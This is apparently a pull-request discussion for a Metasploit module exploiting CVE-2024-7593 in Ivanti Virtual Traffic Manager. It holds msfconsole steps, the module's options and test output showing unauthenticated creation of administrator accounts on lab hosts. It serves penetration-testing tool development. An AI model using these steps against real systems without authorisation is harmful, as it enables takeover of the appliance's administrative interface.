Ivanti Virtual Traffic Manager (vTM) Authentication Bypass (CVE-2024-7593) Module

[h4x-x0r]

This is a new module which exploits an improper access control vulnerability (CVE-2024-7593) in Ivanti Virtual Traffic Manager (vTM). It allows an unauthenticated remote attacker to add a new administrative user to the web interface of the product.

Affected versions include:

• 22.2
• 22.3
• 22.3R2
• 22.5R1
• 22.6R1
• 22.7R1

Verification Steps

1. Docker images are available from here
2. Start msfconsole
3. use auxiliary/admin/http/ivanti_vtm_admin
4. set RHOSTS <IP>
5. run

A new administrative user should have been added to the web interface of the product.

msf6 > use auxiliary/admin/http/ivanti_vtm_admin 
msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
[*] Running module against 172.17.0.2

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version: 22.7R1
[+] New admin user was successfully added:
	h4x0r:w00Tw00T!
[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
[*] Auxiliary module execution completed

Successfully tested on

• 22.7R1 on Ubuntu 20.04.6 LTS

[h4x-x0r]

Successfully verified the MSF module against more affected versions:

• 22.7R1 on Ubuntu 20.04.6 LTS
• 22.6R1 on Ubuntu 20.04.6 LTS
• 22.5R1 on Ubuntu 20.04.6 LTS
• 22.3R1 on Ubuntu 20.04.5 LTS
• 22.2 on Ubuntu 20.04.4 LTS

[grantwillcoxh3ai]

Woops looks like my suggestion broke the linter. Seems this is the issue:

Do not read Set-Cookie header directly, use res.get_cookies instead: if res && res.code == 302 && res.headers.key?('Set-Cookie') && res.headers['Set-Cookie'].include?('ZeusTMZAUTH_') 

I imagine this is the correct line then:

if res && res.code == 302 && res.get_cookies.include?('ZeusTMZAUTH_') 

[bwatters-r7]

msf6 auxiliary(admin/http/ivanti_vtm_admin) > show options

Module options (auxiliary/admin/http/ivanti_vtm_admin):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   NEW_PASSWORD  ScJMvJLqFdvx     yes       Password to be used when creating a new user with admin privileges
   NEW_USERNAME  karri            yes       Username to be used when creating a new user with admin privileges
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         9090             yes       The target port (TCP)
   SSL           True             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       Base path
   VHOST                          no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/ivanti_vtm_admin) > set rhost 10.5.134.153
rhost => 10.5.134.153
msf6 auxiliary(admin/http/ivanti_vtm_admin) > check

[*] 10.5.134.153:9090 - The target appears to be vulnerable. Version: 22.7R1
msf6 auxiliary(admin/http/ivanti_vtm_admin) > run
[*] Running module against 10.5.134.153

[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version: 22.7R1
[+] The target appears to be vulnerable. Version: 22.7R1
[*] Request to add new admin user sent, verifying...
[+] New admin user was successfully added:
	karri:ScJMvJLqFdvx
[+] Login at: https://10.5.134.153:9090/apps/zxtm/login.cgi
[*] Auxiliary module execution completed

[bwatters-r7]

Release Notes

Adds an exploit targeting CVE-2024-7593, an improper access control vulnerability in Ivanti Virtual Traffic Manager (vTM) . It allows an unauthenticated remote attacker to add a new administrative user to the web interface of the product before 22.7R2.